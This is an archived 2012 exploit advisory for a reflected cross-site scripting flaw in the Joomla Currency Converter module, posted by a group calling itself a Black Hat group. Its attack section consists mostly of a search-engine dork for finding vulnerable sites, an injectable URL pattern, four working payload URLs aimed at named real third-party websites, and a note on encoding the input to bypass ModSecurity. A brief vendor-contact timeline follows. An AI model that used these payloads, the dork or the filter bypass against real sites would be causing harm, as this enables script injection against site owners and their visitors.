Joomla Currency Converter Cross Site Scripting

Joomla Currency Converter Cross Site Scripting: Posted Feb 2, 2012; Authored by BHG Security Center; The Joomla Currency Converter module suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 17676f0ac59ba435bf5211fec6a7531485c3d65359f7793062fbaf97594f387c; Download | Favorite | View

Joomla Currency Converter Cross Site Scripting

# Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability
# Date: 2012-02-02 [GMT +7]
# Author: BHG Security Center
# Software Link: http://joomla.org
# Dork: inurl:/includes/convert.php?from=
# Tested on: ubuntu 11.04
# CVE : -
-----------------------------------------------------------------------------------------
Joomla modules (mod_currencyconverter) XSS Vulnerability
-----------------------------------------------------------------------------------------
 
Author : BHG Security Center
Date : 2012-02-02
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
 
PoC/Exploit:
~~~~~~~~~~
------------- ( Cross Site Scripting ) ~ 
 
~ [PoC] ~: Http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]

   ------------- ( Demo Vulnerability ) ~ 
  
   Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
   
   Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
 
   Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
   
   Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
   
   
Note: URL encoded GET input aonvert.php?from= was set to '>><marquee><h1>Pentest</h1></marquee> [For Bypass Mod-Security]
  

 Timeline:
~~~~~~~~~
- 29 - 01 - 2012 bug found.
- 01 - 02 - 2012 vendor contacted, but no response.
- 02 - 02 - 2012 Advisories release.
 
---------------------------------------------------------------------------
Greetz To:A.Cr0x | 3H34N | Cru3l.b0y | ArYaIeIrAN | NoL1m1t | G3n3Rall
 
Spical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | md.r00t And All My Friendz
 
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [Pentesters.ir] And All Iranian HackerZ
-------------------------------- [ EOF ] ----------------------------------

Top Authors In Last 30 Days

Red Hat 249 files
Jay Turla 150 files
indoushka 147 files
Ubuntu 62 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,118)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,071)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,733)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,808)
UNIX (9,452)
UnixWare (188)
Windows (6,763)
Other

Joomla Currency Converter Cross Site Scripting

Joomla Currency Converter Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Currency Converter Cross Site Scripting

Share This

Joomla Currency Converter Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems